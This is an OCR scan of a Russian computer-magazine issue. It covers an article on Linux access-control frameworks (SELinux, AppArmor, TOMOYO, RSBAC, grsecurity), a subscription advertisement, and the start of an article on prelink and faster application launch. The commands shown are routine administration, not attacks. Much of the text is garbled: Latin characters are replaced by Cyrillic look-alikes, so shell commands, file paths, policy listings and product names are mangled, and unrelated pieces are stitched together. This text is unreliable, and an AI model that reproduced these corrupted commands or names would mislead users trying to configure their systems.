спокойно использовать не где-нибудь, а в правительствен- 
ных системах. Анонсирован общественности в 2000 году, 
затем разработчики справедливо решили: зачем что-то 
делать самим, если в интернете есть много желающих? В 
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рафический инструментЗЕЦпих Асітіпіэігаііоп 



результате сегодня проект развивается под лицензией ОМЕІ 
ЭРЕ и уже включен в состав ядра ветки 2.6.x, также выпол- 
нена адаптация для ЕгееВЭВ и ОрепЭоІагіз. 

Реализация МАО требует четкого описания правил, что 
может привести кобразованию большого их количества. 
Поэтому в ЭЕЕіпих использована концепция роль-основан- 
ного контроля доступа Роіе-Вазеб Ассезз Сопігоі (РВАС), в 
которой определяются роли и доступ пользователей. Меха- 
низм защиты в ЭЕЕіпих носитназваниеТуре Епіогсетепі; 
(ТЕ) и позволяетза крепить за каждым процессом и файлом, 
которые необходимо контролировать, некую метку. Если 
процесс, запущенный отимени администратора, ском- 
прометирован, то ущерб, который можетбыть причинен 
системе, ограничен только тем, кчемуон может обращаться, 
согласуясьсустановленными для него правилами (а они 
описываютповедение оченьтонко). Также в ЭЕЕіпих реа- 
лизована многоуровневая система обеспечения безопас- 
ности (МЕ5, МиШ-ЕеѵеІЭесигіІу тобеі), но ее задействуют 
только в особых случаях, например, в правительственных 
многопользовательских системах, требующих чрезвычайно 
высокого уровня защиты. Когда в процессе работы системы 
субъект пытается оказать некое действие на объект, ЭЕЕіпих 
принимает решение о допустимости указанного дейст- 
вия, основываясь на контекстах безопасности объекта и 
субъекта. Субъект — это процессы, выполняемые от имени 
запустившего их пользователя. Объект — элементы фай- 
ловой системы (файлы, каталоги, ссылки, сокеты и пр.) или 
другие процессы, над которыми выполняются действия. И 
теперь самое важное, что отличаетЭЕЕіпих отдругих реше- 
ний, описанных далее — все важные защитные атрибуты 
сохраняются в контекстах безопасности. Поэтому файловая 
система должна уметьхранить дополнительные атрибуты, и 
сами атрибуты нужно как-то задать. Современные ядра все 
обеспечивают, но при самостоятельной пересборке ядра 
не забудь активировать параметр «Ехіепбеб аІІгіЬиІез» в 
выбранной файловой системе. 

Атрибуты устанавливаются при инициализации системы. 
Отсюда делаем вывод, что объект уже должен существо- 
вать на моментустановки атрибутов. Сам атрибут включает 
идентификатор владельца, роль и тип объекта. Причем 
идентификатор ЭЕЕіпих (создается командой зетападе), 
хотя и может совпадать в номере с СЮ пользователя Еіпих 
(иіб), но это две разные вещи. Не забываем еще об одном 
важном отличии — ЭЕЕіпих оперирует ролями, поэтому 
несколько учетныхзаписей Еіпих могут иметь одну и туже 
учетную записьЭЕЕіпих. И главное — выполнение команды 
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Проекты ЬЮ5, бРЗесигіІу и Р5ВАС 



Кроме проектов, описанных в статье, в настоящее время разви- 
ваются и другие, позволяющие повыситьзащиту Кіпих-систем 
— КЮ5 (Кіпих Іпігизіоп 0е1;ес1:іоп Зѵзіепп. Іісіз.огд ). ОКЗесигКу 
[ дгзесигКѵ.огд І и К5ВАС (Виіе 5е1: ВазесІ Ассезз Сопігоі, ѵѵѵѵѵѵ.гзЬас. 
огд ]. Кратко о них. 

Проект и05 реализует МАО, админ может четко указать разреше- 
ния для файлов и каталогов. Помимо этого механизмы ТРЕ (Тгизіесі 
Ра1:І~і ЕхесиЕоп] и ТОЕ (Тгизіесі Вотаіп Епіогсетепі:) позволяют 
убедиться, что программа работаеттак, как предназначено. Сайт 
проекта некоторое время был заброшен, хотя инструменты разви- 
ваются. 

Управление производится при помощи утилит и чем-то напоми- 
нает настройку правил файера. 

# 1ісізсоп:Е -А -о /зЬіп КЕАВОЫЬУ 

бРЗесигіІу — разработка, охватывающая несколько техноло- 
гий укрепления безопасности — МАС/АСЕ, улучшенный сбгооЕ 
рандомизация ТСР І5М и РІВ, ролевая система контроля доступа 
РВАС, функции аудита, защита адресного пространства и стека 
РаХ (доступен и отдельно). Большинство параметров указывается 
на этапе сборки ядра, затем при помощи утилиты дгабт настраи- 
ваются АСЕ. 

Проект Р5ВАС, реализующий мандатный и ролевой механизмы 
доступа, уже в 2000 году вовсю использовался в защищенных дис- 
трибутивах. По сути, это среда, позволяющая создать различные 
модели доступа. Идея основана на публикации Маршала Абрамса 
и Ла Надула «Обобщенная среда для управления доступом» (6ЕАС, 
Сепегабгеб Егатеѵѵогк Іог Ассезз Сопігоі). Кроме гооі: в ОС появ- 
ляется учетка администратора безопасности, который и управляет 
доступом кинформации. 

Реализовано много интересных функций: отключение Еіпих 
□АС, сокрытие процессов, ^АIЕ, поддержка РаХ, антивирусный 
интерфейс Оагико, контроль ресурсов Еіпих и многое другое. 
Например, можно организовать доступ к файлу в определен- 
ные часы. 
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Смотрим активные профили и параметры АррАгтог 



# рз аих I дгер зузІодЛ 

гооР 2729 0.0 0.0 5908 624 ? Зз 07:30 0:00 зузІодЛ -т 0 

# саС /ргос/2729/аЦЦг/сиггепЦ 
зузРет_и : зузРет_г : зуз1одсЗ_Р : зО 

Предусмотрена работа БЕЕіпих втрех режимах — бізаЫе (отключен), 
епіогсіпд (политики выполняются, все, что не соответствует — блоки- 
руется), регтіззіѵе (политики анализируются, все нарушения заносятся 
вжурнал «аѵс: бепіеб», но блокировки не производятся). Узнатьтекущий 
режим просто, как, впрочем, и некоторые другие настройки, достаточно 
прочитать данные из псевдофайловой системы /зеііпих: 

$ саС /зе1іпих/еп:Еогсе 

Если получим 1 , значит, ЗЕЕіпихактивирован. Чтобы изменить режим 
работы налету, просто записываем в этот файл О или 1 : 

# есЛо о > /зе1іпих/еп:Еогсе 



ЗУ не меняет идентификатора БЕЕіпих. То есть гооі: здесь не всевластен. 
Проверить это легко: 

$ ІЛ -2 

изег_и : изег_Ц : ипсопТіпесЗ_1: 

Получаем привилегии суперпользователя и проверяем снова: 



Также можно воспользоваться утилитой «зеІепЬгсе [ Епі'огсіпд I 
Регтіззіѵе МІО ]». 

Собственно настройки производятся в конфигурационных файлах, раз- 
мещенных в каталоге /еіс. В дистрибутивах, базирующихся на РебНаЕ 
доступен графический ЗЕЕіпих Абтіпізігабоп Тооі (зузІет-сопЕд- 
зеііпих, пакет роіісусогеибіз-диі). Так, режим работы устанавливается в 
файле/еіс/зузсопбд/зеііпух (на самом деле это ссылка на /еіс/зеііпих/ 
сопбд). В частности, режим работы определяет параметр БЕЕІМСХ: 



$ зи 

# ісі -2 

изег_и : изег_Ц : ипсопТіпесЗ_1: 

Если зайти сразу под рутом,то роль другая: 

# ІСІ -2 

гооЦ : зузСет_г :ипсопТіпесЗ_1: : Зуз1:етЬоѵ7-Зуз1:етНід]т 

Изменить роль можно при помощи команды пеѵѵгоіе. При использова- 
нии БЕЕіпих штатные команды выводят и контекст. Чтобы просмотреть 
контекст файлов и процессов, набираем: 

# 1з -1 -сопСехС / 

# рз -ах -2 

Крометого, контекст можно считать прямо из/ргос: 



ЗЕЫШХ=епТогсіпд | регтіззіѵе I сіізаЫесі 

Поумолчанию в большинстве дистрибутивов ЗЕЕіпихзащищает не все 
демоны, атолько строго определенные: бЬсрб, ЬЛрб, патеб, пзсб, пірб, 
рогітар, зптрб, здиіб и зузЬдб. Для остальных политика не определе- 
на — ипсопбпеб_Е Чтобы защитить всю систему, необходимо изменить 
значение БЕЕІМПХТУРЕ на зІгісЕ 

ЗЕЕІШХТУРЕ=ЦагдеСесі| зСгісР 

В каталоге/еІс/зеІіпихЛагдеІеб/сопІехІз находим описание контекстов. 
Например, для гооі: контекст описывается так: 

# саС /еРс/зеІіпих/ЦагдеЦесі/сопЦехЦз/изегз/гооІ: 
зузЦет_г :ипсопііпе(і_1: : зО зузСет_г : ипсопііпесі_1: : зО 

зузЦет_г : іпіРгс_1: : зО зуз1:ет_г : ипсопііпе(і_1: : зО 
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сйраЫШу (Іас'йѵеггіііер 

пешогк раскеіір 
петмогк гам+ 

@{РЯЙС}/^/пе1:/ г, 

®{РЯСС}/*/пеі/'* Гр ' 



Все вспомогательныеутилиты ЗЕЫпих собраны в нескольких паке- 
тах: зеіооіз или роИсусогеибІз, роИсусогеиІіІз-пеѵѵгоІе. Первый, как 
правило, уже установлен в системе, остальных нет. Например, пеѵѵгоіе, 
дающая возможность пользователю сменить роль, доступна именно в 
роИсусогеибІз. После установки в системе присутствуюттолько наборы 
политикдля Іагдепеб, остальные наборы политикскачиваются в 
пакетах зеИпих-робсу*. Сорцы политикдля их самостоятельной сборки 
вынесены в зебпих-робсу-беѵеі. 

Разобраться в более чем 200 файлах, имеющих несколько тысяч строк, 
врукопашную оченьтрудно. Автоматизировать этузадачу призван 
питоновый скриптаибі1:2аиоѵѵ (в робсусогеиОІз), он генерирует новые 
политики на основе анализа журналов и блокировок 5 ЕЕі них. 



шГр 

/еІс/ЗКсѴівШ.сагіТ г, 

/е«е/аК:рз/ г* 

/ѵаг/иь/с1^1срЗ/(I^гсиеI1^‘ ігѵ^. 

■ ІикЬ 

Типичная политика АррАгтог 



Сбиваем спесь со Зкуре 



Наверное, больше всего претензий сточки зрения безопасностиу 
пользователя вызываетЗкуре. Куда только нелезет эта прога (см. ста- 
тью Криса «Зкуре: скрытая угроза», ѵѵѵѵѵѵ.хакер.ги/розі/38543/беі'аии. 
азр ). Описываемыетехнологии какраз и позволяютобезопаситьсебя. 
Забегая вперед, скажу, что пользователи уже давно нагенерировали 
профили для большинства популярных прог, и скайп здесь не исклю- 
чение. Смотри, например.здесь: ѵѵѵѵѵѵ.сѵпарзез.огдЛппр/аррагппог/ 
изг.Ып. зкуре . Некоторые профили собраны в отдельном пакете — 
аррагтог-ргобіез. 

Но профиль легко создать и самому. Для этого в комплекте идет утилита 
аа-депргоДили просто депргоД Запускаем еесуказанием исполняе- 
мого файла в качестве параметра: 

$ зийо аа-депргоП /изг/Ьіп/ зкуре 

Далее работаем какобычно: звоним, отсылаем сообщения, прини- 
маем файлы, добавляем и удаляем учетки. Поокончании прерываем 
работу в каталоге/еІс/аррагппог.б/изг.Ьіп. зкуре. Затем перезапускаем 
АррАгтог или просто активируем профиль в епіогсе-режиме: 

$ зийо аа-епПогсе зкуре 

Всепроблемы изамечания по работе профилей АррАгтогищи в логах. 



Чтобы просмотреть все контексты, связанные с Ыірб, введи такую 
команду: 

# дгер -ік кккрсЗ /екс/зеІіпих/СагдеСесі/сопСехСз 



АРРАРМОК 

Технология Аррбсабоп Агтог изначально разработана Іттипіх Іпс. 
Послетого, каксофтверный гигант МоуеК приобрел эту компанию, 
код открыли под лицензией ОМУ ЭРЕ, а затем включили в состав 
орепЗУЗЕ. Позднее АррАгтог стал доступен и в других дистрибутивах. 
Но когда команда Іттипіх покинула МоуеК, дальнейшее развитие 
проекта остановилось. И хотя в том же орепЗУЗЕ поддержка АррАгтог 
была сохранена, в дистрибутив интегрировали ЗЕЫпих. В итоге начали 
разноситься слухи а-ля «АррАгтог із беаб», что у одних вызвало 
радость, так кактеперь все усилия можно бросить на развитие одной 
системы защиты, у других критику — отсутствие конкуренции еще ни 
кчемухорошему не приводило. Сегодня апологетом этой технологии 
является Сапопісаі, разработчики которого не смотря ни на что продол- 
жают развитие АррАгтог. Так, в последних версиях добавлен механизм 
кэширования правил, что позволило ускорить ихзагрузку. Для этихже 
целей, и чтобы защитить сетевые сервисы на раннем этапе загрузки, 
часть профилей вынесли в іпкгатіз. И главное — в ОЬип1:и АррАгтог 
прикрутили к Е5М (Ыпих Зесигку Мобиіез), задействовав зесигі1:у_ра1:б 
вместо УІз. 

Основная идея АррАгтог состоит в том, что система защиты не должна 
быть сложной и недолжна мешать. В отличиеотЗЕЫпих, АррАгтогне 
использует расширенные атрибуты и не зависит от файловой системы. 
Доступ к ресурсам определяется на основе профилей (ргобіез), которые 
привязаны к пути файла или каталога, причем самого файла может и не 
быть на моментактивации профиля. Профиль разрабатывается индиви- 
дуально под каждое приложение. Хотя в этом есть и недостаток: при 
переносе файла в ЗЕЫпихза ним полностью сохраняется контекст безо- 
пасности, в АррАгтог— нет, ноэтого отнего и нетребовали. Хотя, если 
файл имеет два имени, и профиль блокирует доступ кодному из них, 
есть возможность работать с другим. Это следуетучитывать. Также, если 
средствами ЭЕЫпих можно предусмотреть несколько уровней доступа к 
объекту для разных субъектов, то АррАгтог этого не умеет. 

В настоящее время созданы профили для большинства популярных 
серверов и приложений, поэтому наличие активного АррАгтог обычно 
незаметно, он не создает проблем. Крометого, в комплекте поставки 
идут два скрипта аа-депргоі и аа-ЬдргоТ которые помогут быстро со- 
здать профиль для новой программы. Управление АррАгтог произво- 
дится при помощи іпк-скрипта, который за пускает модуль ядра, инициа- 
лизирует профили и монтирует псевдофайловую систему зесигкуіз. 



Ты увидишь, что для разных ситуаций контекст будет отличаться. 

Теперь получим список всех параметров ЭЕЫпих: «деІзеЬооІ -а». Для 
установки используй команду зеІзеЬооІ (с ключом '-Р' для сохранения 
значения после перезагрузки) или графическую утилиту вузІет-сопТд- 
зесигТуІеѵеІ. 

Вывод «зезІаШз -ѵ» покажетвсетекущиеустановки. Незабываем и о 
журналах: 

# скпезд I дгер -і зеііпих 
ЗЕЬіпих: Іпікіаіізіпд . 

ЗЕЬіпих: Зкагкіпд іп регтіззіѵе тосіе 

# дгер -ІЕ зеііпих /ѵаг/іод/теззадез 



$ зийо /екс/іпіС . (Т/аррагтог зСагк 

Чтобы просмотреть списокзагруженных профилей, достаточно считать 
файл /зуз/кегпеІ/зесигТу/аррагтог/ргобІез (или запустить/еІс/іпіТб/ 
аррагтогзІаШз): взависимости от варианта дистрибутива Эегѵег/ 
□езкіор количество активных профилей будет различно. Сами профили 
хранятся в файлах (отдельно для каждого приложения) в каталоге /еіс/ 
аррагтог.б и внутри содержатописание каталогов и отдельных файлов, 
с указанием прав доступа. Также указывается работа в сети и совмес- 
тимость с другими профилями. Для упрощения задачи используются 
регулярные выражения. Поумолчанию профили АррАгтог работают в 
принудительном епіогсе-режиме. Когда сервис не может выйти за рам- 
ки установок, все попытки блокируются и фиксируются в журнале. При 
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п/гип-рдгіз 

5 I і Ь^сс 5^п* * 1 5С^ сс 5 - по <■ 1 !■ дЛ 
ЦЕГ^зЪ іпхііл I і 

/(15 Г/ Ь і п/ іі() е^і і О 

/ПЕР/ 1 і Ьсисс/Ьа ІЛ - гыпкср 

/ПЕГ/ 1 і Ьсхсс/Ьл I -5Іагадс-с Іслпир-л 1 1 -пишпіра іліз 
/(15 р/ 1 1 Ье хс с/]іа I Л - аЛ сі о и - лс р і 
/и Е г/ 1 і Ьс хео/]іа I А - аЛ Ао п - кеу Ьол г А 
/115 г/ 1 і Ьехізс/Ьл ІА-й()Дсі((-5Іогйде 
/(І5Г/ \ \ Ьехес/1іа М -ргпЬе- і пр((і 
/115 г/ 1 і Ьсхсс/Ьл ІА-ргоЬс-рс - Г Іоррц 
/й5г-/ 1 і Ьехсс/Ьа I Д-ргоЬе-5ег і л 1 
/изг/ 1 і Ьсхес/Ьа I А ргаЬс: ктЪіаз 
/ 115 г/Е Ь і п/Л п і Л сс оЛ с 
/«5Г/1 ІЬехес/]іа І4 -ргаЬе-5гогаде 
/изг/1 іЬсхсс/Ьа ІА-ргоЬс Іишс 
икг/кЬ іп/ЬіІрЛ 
/Ып/кіі 

/ Ь і II/ [Лй і I 







В СОППЕМТ- ОізйЫеЛ ГѴіЛс--- 

0-МйС_ГОВ_ГІЬЕ=ЛІ5«Ы(!Л 
0-МАХ АССЕРТ_ЕМТКѴ=2ВЛВ 

0 - Т0М0Ѵ0_иЕВВ08Е Л і за Ы е Л 

1 СОММЕМТ= Есагпіпд МоЛс 

1- МАС РВИ ГІІЕ=Ісагпіпд 

1 - МйХ_АССЁРТ_БМТВѴ-2048 

1 -Т0МВѴВ_дЕВВ03Е=Л ізаЫсЛ 

2- СОММЕМТ- Регтіззіѵс МоЛс- 

2-МАС РОВ РІІЕ=регтІ8$і(л; 
2-МАХ_АССЕРТ_ЕНТВѴ-204В 

2- Т0М0Ѵ0_иЕВВ08Е=спаЫсЛ 

3- СОММЕМТ- ЕпГогсіпд ИоЛс- 

3 МПС _ РОВ _Р I ЕЕ к иГ гіг г і пд 
3-МПХ_АССЕРТ_ЕМТВѴ=2В4В 
3-Т0М0Ѵ0_иЕВВ08Е^спаЫеЛ 



Редактор политикТОМОУО Ыпих 

необходимости его можно перевести в щадящий режим сотріаіп, когда 
нарушения лишь фиксируются. Причем, в отличие от 5Е Ыпих, где режим 
обучения активируется глобально, в АррАгтогего можно включить 
для отдельного профиля. Перевести профиль в щадящий режим можно 
тремя способами: 

• указать в файле профиля і"[ад5=(соппр[аіп); 

• использовать команду сотріаіп название_программы (вернуть коман- 
дой епЬгсе): 

• или глобально командой «есбо 1 > /зуз/кегпеІ/зесигТу/аррагтог/ 
сопДоІ/сотрІаіп». 

А еще профили отключаются налету, перегружаются, в общем, полная 
свобода действий. Собственно, простота и привлекаете АррАгтогадми- 
нов, разработчиков и простых пользователей. 

Дополнительные профили можно найти в репозитории дистрибутива 
(арІ-сасЬе зеагсб аррагтог), кроме того, есть онлайн-банк профилей — 



и может использоваться в ядрах 2.4 и 2.6. Вторая (которая уже в ядре) 
адаптирована под 15М, но по функциональным возможностям усту- 
пает версии 1 .X: нет поддержки сетевых функций, обработки атрибутов, 
Р051Х-возможностей (на сайте представлена сравнительная таблица). 
В настоящее время соответствующие пакеты имеются в репозиториях 
многих дистрибутивов, но фактически поддержка заявлена пока только 
в Мапбгіѵа. К слову, в этом дистрибутиве предлагается и графический 
интерфейс Тотоуо ОІЛ, позволяющий запустить и настроить политики 
приложений. Доступность в репозиториях пакетов для большинства 
дистрибутивов позволяет буквально в считанные минуты перевести ОС 
на новую систему безопасности. Например, ОЬипШ 10.04: 

$ зисіо есііо ' сіеЬ ІоССр : / /озсіп . сіі . зоигсеРогде . зр/ 
Сотоуо/47128/ ./' » /еСс/арС/зоигсез . ІізР 
$ зийо арР-деР ирсіаРе 



аррагтог.орепзизе.огд . 

Кслову, для ядер 2. 4/2. 6 существовала разработка Тгизіеез ( ігизіеез. 
зОпеО . реализующая АСЕ а-ля МоѵеЕ Меіѵѵаге, которая в удобной форме 
расписывала доступ к каталогам вплоть до указания отдельных групп и 
пользователей и не зависела от файловой системы. Ксожалению, проект 
заглох, а это была бы золотая середина между СЕЫпих и АррАгтог. 

томоуоымих 

ПроектТСМСУС Ыпих ( іотоѵо.зЕі р) начатв 2003 году японской компа- 
нией МТТ САТАССРРСЕАТІСМ каклегкая реализация МАС для Ыпих- 
ядра. Через два года лицензию изменили на СМС СРЕи выложили код 
на ЗЕ.пеЕ Некоторое время проект предоставлял патчи и готовые сборки 
ядер для разных дистрибутивов. Но начиная с версии ядра 2.6.30, код 
ТСМСУС Еіпих включен в основную ветку разработки, что уже само по 
себе — Событие для любого подобного проекта. 

В настоящее время существует две версии ТСМСУС Еіпих. Первая вер- 
сия используеторигинальные хуки, она доступна только в виде патчей 

Шаблоны политикТОМОУО Ыпих 

Файл Гавела Вѵщ Журнап Эмлвдкн Кагтрейка Спрака 

іп1Еій1і2е_[іаіліп /^Ыл/ммір гйЬе ‘ 

* *ГГ г/ео Г РІПІ 

1 1 вт Е Г/Пй Гв« Ей 

Т11й_рл1 Ее гп ^ргос/ЧіУв Е Е г/квус гелЕе 
^11е_раЕЕвгл /рп№/Ч|/вЕЕг/ргеѵ 

Е I *Г Л ^рг«/4$ Д Е Е Г / зоскс ГМіе 
гіи.раіЕігл /рик/чі/вѵйУ 
Г11л_АлЕЕеГл /рПк/ЧІі^ЁІі«Г_ГіТ» 

^іАе_рлЕ Е врл ^ргос/ЧіУсіЛІіпв 
іГі1л_раЕЕвгл ргѵс/Ч|/евіп«іыір_і^іІЕег 
Г1іе_рЛЕЕ*ГЛ /рГРС/Ч)/«ЛѴІГ4П 

гііі_рйЕЕігл ^ртас/чі/гаігіго/ч* 

Т11е_рвЕЕегл 

^іАе_реЕЕвгл /ргос/Чі/Іл Еепсу 
^дІл_рАЕЕегл /рпи/Чі/ІІліЕя 
Ше.рАікгл /ргос/Чі/іедіпиіА 
^11е_раЕЕвгл /рг(№/Ч|/ілря 
Г1іе_рЛЕЕ*ГЛ Ургрс/ЧІ/Мй 
Г1І(і_рйЕЕІГГ /р^ОС/Ч)/МО^РI1Р^О 
Т11л_реЕЕвГл ^ргРР/ЧІ/іацпЕі 

^іАв_рвЕЕВГЛ /РГ0С/ЧІ/|(Ш[|Е5ЕВІ5 

іГіІй^раЕ Е в гл /рП№/Ч|/ЛвЕ/АПуСВ5Е& 

Ш*_РІНІ*:ГГ УрГ«/Ч1/Л*Е/ЛГР 
!Г11«_рйЕЕ«ГЛ /рЕРС/ЧІ/ЛЙЕ^ЛіУ 
ТІІБ_рвЕЕеГл ^ргѵБ/Ч1/лаЕ/Аеѵ_лсі5Е 
^іІЕ_раЕ Евгл / рпк/ЧІ/лл Е /авѵ.^лйрб/еЕ Пб 
^іДе_^Е Е ег л /рг№р/Ч)/лвЕ/(1еѵ_;ал>рв/1Ій 
ГІІ*_РІІЕЕ*ГЛ ^ріГ«/Ч1/ЛРЕ,^1Г_ІЛ*І6 
Г11а..рІІЕ*Гг ѴріРС/ЧІ/лйЕ.'Іряр 
ТіІе_і>лЕЕвгл ^рпк/ЧІ^лйЕ/ідлрб 




$ зийо арЦ-деС іпзСаІІ Ііпих-ссз ссз-СооІз 

Если ядро собирается самостоятельно, активируй параметр «ЕпаЫе 
біЛегепІзесигЕу тобеіз» и «ТСМСУС Еіпих Зиррогі:» в секции Зесигііу 
орЕопз. 

При беглом взгляде ТОМОУО очень похож на АррАгтог. Обе системы кон- 
тролируют путь (раібпаппе Ьазеб), а правила имеют сходный синтаксис. 
Но есть и отличия. Так, в ТОМОУО можноуказать поведение программы 
в зависимости оттого, как она запущена. Например, оболочка, запущен- 
ная через 55 Н, может иметь больше ограничений, чем запущенная с 
локальной системы. Предусмотрена проверка дополнительных парамет- 
ров, с которыми включена программа, атакже привилегий (ІЛС/ССС). 
Приложения в терминологии ТСМСУС называются доменами (ботаіпз). 
Конфигурационные файлы ТСМСУС находятся в каталоге /еіс/іоппоуо, 
после запуска системы настройки имеютсвое отражение в/ргос/Ьтоуо, 
где их можно редактировать на лету. Параметры работы ТСМСУС хранят- 
ся в/е1;с/1;оппоуо/ргоЕ[е.соп1 и доступны в/ргос/іотоуо/ргоЕІе. Именно 
здесь определяются режимы работы ТСМСУС — бізаЫе, регтіззіѵе, 
епіогзіпд и Іеагпіпд (обучаясь, система сама строит правила). Есть и 
другие файлы: 

• тападег.сопі (/ргос/Ьтоуо/тападег) — программы, которые могут 
изменить политику в /ргос/іотоуо; 

• ехсерЕоп_ро[ісу.сопІ (/ргос/і:оппоуо/ехсербоп_ро[ісу) — исключения 
для политикдомена; 

• ботаіп_ро[ісу.сопІ (/ргос/і:оппоуо/боппаіп_ро[ісу) — политики домена; 

• тетіпіо.сопі (/ргос/Ьтоуо/тетіпІо) — настройка использования 
памяти и квот. 

После установки пакета ссз-іооіз необходимо провести инициализацию 
ТСМСУС, выполнив скрипт/и5г/[іЬ/сс5/і:оппоуо_іпі1:_ро[ісе.5Ь, который и 
создаст нужные конфиги. Далее потребуется перезагрузка системы. 
Затем можно запускать редактор политик: 

# /изг/ІіЬ/ссз/есііЦроІісу /еСс/Сотоуо/ 

Еще одна немаловажная черта — ТСМСУС может работать параллельно 
с 5ЕЕіпих и АррАгтог. ~и~ 
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подпишись 

$Ьор.д1с.ги 



Подписка - это: 

■ Выгода ■ Гарантия ■ Сервис 





ВЫХОДИТ 2 раза в месяц 

1 2 номеров 2400 руб. 
24 номера 4400 руб. 



6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



6 номеров 91 2 руб. 
12 номеров 1656 руб. 






Призер фесіивалей 

аж.тг.н'ииѵгр 4&РРЦ704Ц 



6 номеров 1200 руб. 6 номеров 1080 руб. 

1 2 номеров 2200 руб. 1 2 номеров 1 960 руб. 





йШЕРСКАЯІ 






6 номеров 1 056 руб. 
12 номеров 1920 руб. 



6 номеров 747 руб. 
12 номеров 1350 руб. 



6 номеров 890 руб. 
12 номеров 1630 руб. 



3 номера бЗО руб. 
б номеров 1140 руб. 



6 номеров 890 руб. 
12 номеров 1630 руб. 




6 номеров 1 200 руб. 
12 номеров 2100 руб. 



6 номеров 1 200 руб. 
12 номеров 2100 руб. 



6 номеров 990 руб. 
12 номеров 1790 руб. 



6 номеров 726 руб. 
12 номеров 1320 руб. 



6 номеров 600 руб. 

1 2 номеров 1 080 руб. 




только на сайте 



2 номера 284 руб. 




только на сайте 



4 номера 556 руб. 

8 номеров 1 008 руб. 






6 номеров 774 руб. 

1 2 номеров 1 404 руб. 



6 номеров 564 руб. 
13 номеров 1105 руб. 



6 номеров 450 руб. 
1 3 номеров 975 руб. 




(дате)іаті 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 

Реклама 


















иыіхою 



Евгений Зобнин гоЬпіпШдтаіІ.сот 





С реактивным 

ранцем 



Ускоряем запуск приложений в Ыпих 




Ыпих становится всетяжелее и тяжелее. Сегодня уже никого не удивишь 
приложениями, время запуска которых составляет несколько минут, 
окружениями рабочего стола, занимаюідими 500 Мб оперативки, и 
нерасторопной загрузкой ОС, напоминаюідей походженидины по 
магазинам. Есть ли способы все это оптимизировать, суіцествуетли 
лекарство от ожирения пингвинов, где взять ножик, чтобы отрезать все 
лишнее? Попробуем разобраться. 



За все время существования толстых пинг- 
винов (период, отсчитываемый примерно 
с момента появления ОТК+ 2.Х, X Ргее4.Х и 
Ыпих 2.6) было придумано немало способов 
ускорения запуска приложений и всей ОС. 
Некоторые из них уже давно успешно приме- 
няются в популярных дистрибутивах, другие 
до сих пор значатся экспериментальными. В 
этой статье мы посмотрим на них повнима- 



тельнее и определим, насколько оправдан- 
ным может быть их применение. 

ПРЕДВАРИТЕЛЬНОЕ 
СВЯЗЫВАНИЕ ИЛИ РРЕЫМК 

Пре-связывание есть ни что иное, какмодифи- 
кация запускаемого файла с целью включить 
в него результаты динамического связывания 
библиотек. Что это значит? 



В стародавние времена приложения были 
просты и использовали в своей работе всего 
несколько динамически загружаемых систем- 
ных библиотек. То было время господства фор- 
мата исполняемых файлов а.оиі, особенность 
которых заключалась в предельной простоте. 
Файлы а.оиі: всегда точнознали, по какому ад- 
ресу они будут за гружены в память процесса, и 
по каким адресам будут располагаться их внут- 
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0 V» ЬиіуЬох ІТ л ѵаіХ«Ы« . 






Редактируем конфигурацию утилиты 
црсіа1:е-іпі1:гапп]'5 



РеасІаЬеасІ в графике Ьоо1:сЬаг1: 




> ѵѵагпіпд 

В установке ргеііпк 
для иЬипІи нет 
необходимости. 
Этот дистрибутив 
использует 
альтернативный 
метод, называемый 
□Т_6Ми_НА5Н 
и реализованный 
на уровне корневой 
библиотеки (дІіЬс). 




ренние функции, константы и т.д. Эта особенность, с одной 
стороны, давала им преимущество в скорости загрузки, а с 
другой — создавала проблемы сосуществования библио- 
тек в памяти (что, если две библиотеки будут за гружены в 
память по одному адресу?). Проблемы надо было решать, 
поэтому появился формат ЕІР (его создатели на самом деле 
были поклонниками книгТолкиена :)), который снимал с 
исполняемых файлов ответственность за выбор адреса 
своего размещения в виртуальной памяти и перекладывал 
ее на динамический линковщик. Отныне адреса загрузки 
приложений, библиотек и всех их символов (переменных, 
констант, функций т.д.) вычислялись динамически на этапе 
загрузки. 

ЕІР позволил ОМІХ/Еіпихсделатьогромный шагвперед и 
стать системой, способной загружать и исполнять огром- 
ное количество приложений, сл и н кованных с таким же 
количеством библиотек, без всяких проблем. Однако сточки 
зрения производительности это был провал. Процедура 
динамического связывания очень быстра, и при запуске 
приложений, зависящих всего отнескольких библиотек, 
она не вносит в процесс заметных задержек, но если это 
запуск громоздкого приложения сзависимостями порядка 
50 библиотек, то задержка может быть весьма существенной 
(вплоть до нескольких десятков секунд). 

Так называемое пре-связывание наделяет ЕЕР-файлы наи- 
более выгодной чертой формата а.оиР Запускаемые файлы 
модифицируются таким образом, чтобы уже включать в себя 
результат динамического связывания и, соответственно, 
заранее знать собственные адреса в памяти процесса и не 
тратить на их вычисление время втечениезапуска. 
Процедура пре-связывания была предложена сотрудником 
ПесІ На! 5акиЬ 5еІіпекеще в 2004 годуй оказалась очень 
удачным методом повышения скорости запуска приложе- 
ний. Согласнотестам, она может дать прирост, равный 50% 
от первоначальной скорости запуска, а в особотяжелых 
случаях (ОрепОІбсе, КОЕ, бпоте) — и того больше. При этом 
для ускорения системы достаточно запустить всего одну 
команду и немного подождать. 

Да, задействовать механизм пре-связывания действитель- 
но просто. Для этого уже упомянутый выше 5акиЬ 5еІіпек 
написал программу под названием ргеііпк. Она доступна 
практически в любом Еіпих-дистрибутиве, поэтому собирать 
из исходников ничего не придется. Просто установи пакеты 
ргебпк, используя пакетный менеджер дистрибутива, и 
выполни следующую команду: 

# ргеііпк -аѵтК 



Аргументы командной строки в этом случае значат следую- 
щее: 

• V — выводить больше информации на экран; 

• а — подвергнуть пре-связыванию все бинарные 
файлы; 

•т — сохранить виртуальную память (нужно, если 
библиотек очень много) ; 

• К — рандомизировать порядок следования участ- 
ков памяти (повышает уровень заіциты от атак на 
срыв стека) . 

После окончания выполнения приложения можно начинать 
радоваться ускорению. Однако стоит помнить о нескольких 
ограничениях: 

1 . Ргеііпк не способен увеличить скорость загрузки бинар- 
ников, скомпилированных без опции '-ІРІС. К сожалению, 
таких библиотек достаточно много, обычно сборщики паке- 
тов нарочно отключают этотфлагдля увеличения произво- 
дительности приложения; 

2 . Ргеііпк неумеетобрабатывать библиотеки проекта ѵѵіпе, 
поэтому об ускорении ѴѴіпсІо\л/5-софта придется забыть; 

3 . Некоторые статические библиотеки могут перестать 
запускаться после обработки ргеііпк; 

4 . После установки новых приложений или библиотек опе- 
рацию прелинкинга рекомендуется повторить. 

Для удаления ргеііпк делаем так: 

• ргеііпк -аи 

Далее можно тереть пакет из системы. 

ПРЕДВАРИТЕЛЬНАЯ 
